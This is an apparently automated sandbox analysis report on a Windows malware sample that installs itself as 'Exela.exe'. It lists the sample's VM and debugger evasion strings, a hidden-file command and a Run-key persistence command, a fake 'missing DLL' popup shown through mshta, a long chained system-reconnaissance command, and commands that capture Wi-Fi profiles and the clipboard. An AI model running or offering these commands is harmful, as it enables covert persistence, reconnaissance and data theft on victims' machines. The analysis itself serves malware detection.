Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1957627500.000002DCD179E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SERVICE_NAME: vmicvss
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1970902588.000002DCD179E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1957627500.000002DCD179E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
Source: svchost.exe, 0000003B.00000002.2894003086.000001B77262B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003130467.000002DCD2BF0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: "vmsrvc.exe"@
Source: NETSTAT.EXE, 0000004D.00000002.1789561551.0000016B17F99000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1957627500.000002DCD179E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SERVICE_NAME: vmicshutdown
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1735254245.000002DCD0DF6000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1961094349.000002DCD14C1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1955400520.000002DCD1507000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1959010647.000002DCD0DB4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1961262415.000002DCD0E25000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: hostNames = ['sandbox','cuckoo', 'vm', 'virtual', 'qemu', 'vbox', 'xen']
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003130467.000002DCD2BF0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vmwaretray.exe01
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003130467.000002DCD2BF0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: "vmsrvc.exe"
Source: sc.exe, 0000004E.00000002.1790234355.000002674931A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: WLAN AutoConfigWlanSvcWindows Insider ServicewisvcWindows Remote Management (WS-Management)WinRMWindows Management InstrumentationWinmgmtWinHTTP Web Proxy Auto-Discovery ServiceWinHttpAutoProxySvcMicrosoft Defender Antivirus ServiceWinDefendStill Image Acquisition EventsWiaRpcWi-Fi Direct Services Connection Manager ServiceWFDSConMgrSvcWindows Error Reporting ServiceWerSvcProblem Reports Control Panel SupportwercplsupportWindows Encryption Provider Host ServiceWEPHOSTSVCWindows Event CollectorWecsvcWebClientWebClientMicrosoft Defender Antivirus Network Inspection ServiceWdNisSvcDiagnostic System HostWdiSystemHostDiagnostic Service HostWdiServiceHostWindows Connect Now - Config RegistrarwcncsvcWindows Connection ManagerWcmsvcWindows Biometric ServiceWbioSrvcBlock Level Backup Engine ServicewbengineWarpJITSvcWarpJITSvcWalletServiceWalletServiceWindows TimeW32TimeVolume Shadow CopyVSSHyper-V Volume Shadow Copy RequestorvmicvssHyper-V PowerShell Direct ServicevmicvmsessionHyper-V Time Synchronization ServicevmictimesyncHyper-V Guest Shutdown ServicevmicshutdownHyper-V Remote Desktop Virtualization ServicevmicrdvHyper-V Data Exchange ServicevmickvpexchangeHyper-V Heartbeat Servicevmicheartbeat
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003130467.000002DCD2BF0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: b"vmware"P+
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003130467.000002DCD2BF0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: "vmusrvc.exe"
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003130467.000002DCD2BF0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: qemu-ga.exe05
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1961262415.000002DCD0E25000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: "vmacthlp.exe", # VMware
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003130467.000002DCD2BF0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vmsrvc.exep3
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003130467.000002DCD2BF0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: "qemu-ga.exe"
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1961262415.000002DCD0E25000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: if b'VMware' in stdout:
Source: HOSTNAME.EXE, 00000039.00000002.1748389262.000001AF608A9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll\\
Source: C:\Windows\System32\wbem\WMIC.exe Process information queried: ProcessInformation Jump to behavior
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Code function: 0_2_00007FF72AA8B1B8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00007FF72AA8B1B8
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Code function: 0_2_00007FF72AA940D0 GetProcessHeap, 0_2_00007FF72AA940D0
Enables debug privileges
Source: C:\Windows\System32\tasklist.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\tasklist.exe Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe Process token adjusted: Debug
Source: C:\Windows\System32\NETSTAT.EXE Process token adjusted: Debug
Source: C:\Windows\System32\NETSTAT.EXE Process token adjusted: Debug
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Code function: 0_2_00007FF72AA8B1B8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00007FF72AA8B1B8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Code function: 0_2_00007FF72AA7C88C SetUnhandledExceptionFilter, 0_2_00007FF72AA7C88C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Code function: 0_2_00007FF72AA7C6AC IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00007FF72AA7C6AC
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Code function: 0_2_00007FF72AA7BE20 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00007FF72AA7BE20
Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe Code function: 81_2_00007FF6E3A7B1B8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 81_2_00007FF6E3A7B1B8
Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe Code function: 81_2_00007FF6E3A6C88C SetUnhandledExceptionFilter, 81_2_00007FF6E3A6C88C
Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe Code function: 81_2_00007FF6E3A6C6AC IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 81_2_00007FF6E3A6C6AC
Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe Code function: 81_2_00007FF6E3A6BE20 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 81_2_00007FF6E3A6BE20
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get Manufacturer" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "gdb --version" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path Win32_ComputerSystem get Manufacturer" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe"" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Exela Update Service" /t REG_SZ /d "C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe" /f" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profiles" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get Manufacturer Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic path Win32_ComputerSystem get Manufacturer Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Exela Update Service" /t REG_SZ /d "C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe" /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c chcp
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c chcp
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Get-Clipboard
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\HOSTNAME.EXE hostname
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic logicaldisk get caption,description,providername
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net user
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\query.exe query user
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net localgroup
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net localgroup administrators
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net user guest
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net user administrator
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic startup get caption,command
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /svc
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\ipconfig.exe ipconfig /all
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\ROUTE.EXE route print
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\ARP.EXE arp -a
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\NETSTAT.EXE netstat -ano
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc query type= service state= all
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh firewall show state
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh firewall show config
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Windows\System32\net.exe Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user
Source: C:\Windows\System32\query.exe Process created: C:\Windows\System32\quser.exe "C:\Windows\system32\quser.exe"
Source: C:\Windows\System32\net.exe Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 localgroup
Source: C:\Windows\System32\net.exe Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 localgroup administrators
Source: C:\Windows\System32\net.exe Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user guest
Source: C:\Windows\System32\net.exe Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user administrator
Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe Process created: unknown unknown
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "mshta "javascript:var sh=new activexobject('wscript.shell'); sh.popup('the program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. try reinstalling the program to fix this problem', 0, 'system error', 0+16);close()""
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new activexobject('wscript.shell'); sh.popup('the program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. try reinstalling the program to fix this problem', 0, 'system error', 0+16);close()"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "echo ####system info#### & systeminfo & echo ####system version#### & ver & echo ####host name#### & hostname & echo ####environment variable#### & set & echo ####logical disk#### & wmic logicaldisk get caption,description,providername & echo ####user info#### & net user & echo ####online user#### & query user & echo ####local group#### & net localgroup & echo ####administrators info#### & net localgroup administrators & echo ####guest user info#### & net user guest & echo ####administrator user info#### & net user administrator & echo ####startup info#### & wmic startup get caption,command & echo ####tasklist#### & tasklist /svc & echo ####ipconfig#### & ipconfig/all & echo ####hosts#### & type c:\windows\system32\drivers\etc\hosts & echo ####route table#### & route print & echo ####arp info#### & arp -a & echo ####netstat#### & netstat -ano & echo ####service info#### & sc query type= service state= all & echo ####firewallinfo#### & netsh firewall show state & netsh firewall show config"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "mshta "javascript:var sh=new activexobject('wscript.shell'); sh.popup('the program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. try reinstalling the program to fix this problem', 0, 'system error', 0+16);close()"" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "echo ####system info#### & systeminfo & echo ####system version#### & ver & echo ####host name#### & hostname & echo ####environment variable#### & set & echo ####logical disk#### & wmic logicaldisk get caption,description,providername & echo ####user info#### & net user & echo ####online user#### & query user & echo ####local group#### & net localgroup & echo ####administrators info#### & net localgroup administrators & echo ####guest user info#### & net user guest & echo ####administrator user info#### & net user administrator & echo ####startup info#### & wmic startup get caption,command & echo ####tasklist#### & tasklist /svc & echo ####ipconfig#### & ipconfig/all & echo ####hosts#### & type c:\windows\system32\drivers\etc\hosts & echo ####route table#### & route print & echo ####arp info#### & arp -a & echo ####netstat#### & netstat -ano & echo ####service info#### & sc query type= service state= all & echo ####firewallinfo#### & netsh firewall show state & netsh firewall show config" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new activexobject('wscript.shell'); sh.popup('the program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. try reinstalling the program to fix this problem', 0, 'system error', 0+16);close()"
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Code function: 0_2_00007FF72AA9A420 cpuid 0_2_00007FF72AA9A420
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\aiohttp VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\aiohttp VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\aiohttp VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\attrs-23.2.0.dist-info VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\attrs-23.2.0.dist-info VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\cryptography-42.0.5.dist-info VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\cryptography-42.0.5.dist-info VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\cryptography-42.0.5.dist-info VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\cryptography-42.0.5.dist-info VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\cryptography-42.0.5.dist-info VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\cryptography-42.0.5.dist-info VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\cryptography-42.0.5.dist-info VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\cryptography-42.0.5.dist-info VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\_ctypes.pyd VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\aiohttp VolumeInformation Jump to behavior
